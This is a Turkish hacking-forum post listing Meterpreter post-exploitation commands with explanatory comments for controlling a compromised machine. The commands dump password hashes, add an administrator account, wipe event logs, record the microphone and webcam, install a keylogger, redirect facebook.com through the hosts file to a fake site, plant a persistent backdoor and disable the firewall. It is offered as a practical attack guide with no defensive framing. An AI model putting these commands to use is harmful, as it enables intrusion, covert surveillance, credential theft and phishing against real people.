-
excalibur16
[]
Meterpreter oturumu aldığınız cihazı ele geçirebilirsiniz örnek olarak android sistem ele geçirme konusu;
http://www.spyhackerz.com/forum/threads/android-sistem-ele-geçirme-msf.548/
http://www.spyhackerz.com/forum/threads/android-sistem-ele-geçirme-msf.548/
PHP:
[LIST=1]
[*]METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR
[*]İpconfig --a
[*]//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.
[*]sysinfo
[*]//Hedef Sistem Hakkında Bilgi Alınır.
[*]getuid
[*]//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.
[*]getpid
[*]//Mevcut Sistem Pid Numarasını Gösterir
[*]run hashdump
[*]//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.
[*]shell
[*]net user test sifre (add
[*]net user test /active:yes
[*]net localgroup Administrators test /add
[*]//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu
[*]ile yeni kullanıcı oluşturabiliriz.
[*]clearev
[*]//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.
[*]run event_manager –c
[*]//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.screenshot –p /root/ekrangoruntusu.jpeg –q 60
[*]//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.
[*]record_mic –d 60 -f /root/seskaydi.wav
[*]//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi
[*]yapılabilir.
[*]webcam_list
[*]//hedef sistemdeki kameralar listelenir.
[*]webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false
[*]//hedef sistemin webcami kullnılarak goruntuler alınır.
[*]pwd
[*]//Bulunulan dizinin ismini verir.
[*]run keylogrecorder
[*]//Hedef Sisteme Keylogger yükleyebiliriz.
[*]cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt
[*]//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili
[*]bilgileri görebilirsiniz.
[*]Run Komutu İle Kullanabileceğimiz scriptleri:
[*]/opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.run winenum
[*]//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik
[*]çalıştırarark sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.
[*]upload /root/dosya c:\Windows
[*]//hedef sisteme kali sunucudan dosya upload edebiliriz.
[*]download f:\\iplisteleri.txt /root/
[*]Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.
[*]run get_application_list
[*]//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti
[*]kullanabiliriz.
[*]run getgui -u ali –p 12345
[*]//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu
[*]kullanıcı ile rdp yapabiliriz.
[*]cat /root/sahtehostdosyasi.txt
[*]192.168.10.23 facebook.com
[*]192.168.10.23 www.facebook.com
[*]run hostedit -l /rootsahtehostdosyasi.txt
[*]//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti //
[*]ile bu dosyayı belirterek hedef sistemin host dosyası değiştirilmiş olur.
[*]// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
[*]run scraper
[*]//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.run metsvc
[*]//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.
[*]cat /root/command.txt
[*]sysinfo
[*]checkvm
[*]get local subnets
[*]getuid
[*]run multiscript -rc /root/command.txt
[*]//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
[*]run Getcountermeasure
[*]//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
[*]run getgui -e
[*]//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.
[/LIST]
